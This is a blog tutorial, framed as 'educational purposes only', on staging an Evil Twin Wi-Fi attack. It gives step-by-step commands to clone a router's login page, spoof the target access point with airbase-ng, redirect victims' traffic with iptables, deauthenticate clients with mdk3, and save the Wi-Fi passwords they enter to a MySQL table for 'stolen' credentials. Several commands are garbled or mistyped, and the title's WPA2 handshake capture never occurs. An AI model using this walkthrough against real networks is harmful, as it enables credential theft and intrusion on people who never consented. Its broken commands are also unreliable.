Evil Twin With Wpa2 Capture - Sun, Sep 15, 2024
How To Create An Evil Twin With Wpa2 Capture (Educational Purposes Only)
Introduction
Let’s talk about Evil Twin attacks—one of the more deceptive techniques in wireless security exploitation. Essentially, we’re going to create a rogue access point that mimics a legitimate one, tricking unsuspecting users into connecting. From there, we capture the WPA2 handshake, which can then be used to crack the network.
In this post, I’ll walk you through the process step by step, showing you how to set up the attack, capture the necessary data, and ultimately gain access. It’s a powerful method and one that demonstrates just how vulnerable networks can be, even when they appear secure.
So, if you’re ready to learn how to create an evil twin and capture WPA2 handshakes, let’s get started.
So, the first thing we’re going to do do is install isc-dhcp server to our system. The ISC DHCP server is a tool used to assign dynamic IP addresses to devices within a network. Once installed, you can configure it to handle DHCP requests, allowing clients to obtain IP addresses automatically on your network.
apt-get install isc-dhcp-serverAfter installing isc-dhcp-server, we need to add some stuff into dhcpd.conf located in /etc/. I’m assuming you have the same local IP structure as me (192.168.1..). But if you have a structure like 192.168.0.., you need to replace that in the below code. So here it is:
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.1.255;
option routers 192.168.1.129;
option domain-name-servers 8.8.8.8;
range 192.168.1.130 192.168.1.140
}I will try my best to explain what each line means.
authoritative: Declares this DHCP server as the authoritative server for the network. If there are any other DHCP servers on the network, this one takes priority, and clients will listen to it for IP leases. This is important for resolving IP conflicts or incorrect leases.
default-lease-time 600: Sets the default lease time for IP addresses to 600 seconds (10 minutes). If a client doesn’t request a specific lease time, this value will be used.
max-lease-time 7200;: Sets the maximum lease time to 7200 seconds (2 hours). This is the longest period a client can hold an IP address before it must renew or release the lease.
subnet 192.168.1.128 netmask 255.255.255.128 { … }: This defines the subnet as 192.168.1.128/25 (IP range: 192.168.1.128 to 192.168.1.255), with a subnet mask of 255.255.255.128. Devices in this network will get their IP addresses dynamically assigned from the defined range.
option subnet-mask 255.255.255.128: Specifies the subnet mask that will be provided to clients. This ensures clients know which part of the IP address identifies the network and which part identifies the host.
option broadcast-address 192.168.1.255: Defines the broadcast address for the subnet. This is the IP address used to send packets to all devices on the network.
option routers 192.168.1.129: Specifies the default gateway (router) that clients should use to access devices outside this subnet. In this case, it’s set to 192.168.1.129.
option domain-name-servers 8.8.8.8: Provides the Google Public DNS server (8.8.8.8) as the DNS resolver for clients. Clients will use this DNS server to resolve domain names to IP addresses.
range 192.168.1.130 192.168.1.140: Defines the IP range from 192.168.1.130 to 192.168.1.140. These are the addresses that the DHCP server will dynamically assign to devices on the network.
This configuration ensures that devices on the subnet can automatically receive the correct network settings to communicate effectively within the network and beyond.
Now we need to go into /var/www, which is typically the default directory where web server files are stored (such as for Apache or Nginx). This is where you would place your website’s files, like HTML, CSS, and scripts, to serve them over the web. Anyways, we’ll go into that directory and delete the default index.html file.
PS: You need to download the login page files for the target router (ex: download the TP-Link’s login page files).
cd /var/www
rm index.htmlThen we paste the router’s page files into /var/www. Now we’re ready to start our local server.
/etc/init.d/apache2 start
/etc/init.d/mysql startmysql -U rootInside mysql, you’ll need to create a new database to store the stolen usernames and passwords.
create database evil_twin;
use evil_twin;
create table wpa_keys(password varchar(64), confirm varchar(64));Now that it’s done, fire up a new terminal. We’re gonna do some IP routing.
ip route {your-network-interface} {your-local-ip}Now we need to manage wireless network interfaces. Specifically, airmon-ng puts the wireless interface into monitor mode, allowing you to capture wireless traffic. In this case, you’re targeting the interface wlan0mon, which is likely already in monitor mode. If the interface was initially wlan0, running airmon-ng start wlan0 would have switched it to wlan0mon. Monitor mode is essential for network analysis, packet capturing, and attacks like Evil Twin or WPA handshake captures.
airmon-ng start wlan0
airodump-ng -M wlan0monHave a look at the output. You need to copy the target’s ESSID, channel number, and BSSID
airbase-ng -e {ESSID} -c {channel number} -P {monitor interface}Now fire up a new terminal, don’t close airbase.
ifconfig a+0 192.168.1.129 netmask 255.255.255.128
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129Now we’ll be doing some IP rerouting:
echo > 1 /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination {your-local-ip}:80
iptables -t nat -A POSTROUTING -j MASQUERADEWe’re finished rerouting the iptables. After that, we’ll be starting our dhcpd server, so let’s open another terminal:
mkdir -p /var/lib/dhcp
touch /var/lib/dhcp/dhcpd.leases
touch /etc/dhcpd.conf
dhcpd -t -cf /etc/dhcpd.conf -lf /var/dv/dhcpd.leases
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcod.pid at0
/etc/init.d/isc-dhcpd-server startNow we will deauth the devices in the original target network:
echo {BSSID} > blacklist
mdk3 wlan0mon d -b blacklist -c {channel-number}There we go! Now the devices in the target network will be disconnected, and since we’re continously sending deauth signals to that router, target devices will have no other option than to connect to our evil twin, since their mac addresses are the same.
And when they try to go into any website, they will face the router’s ’login’ page we’ve created. And if you’re lucky, once they enter the username and password for their router, those will be saved to our mysql database. Boom.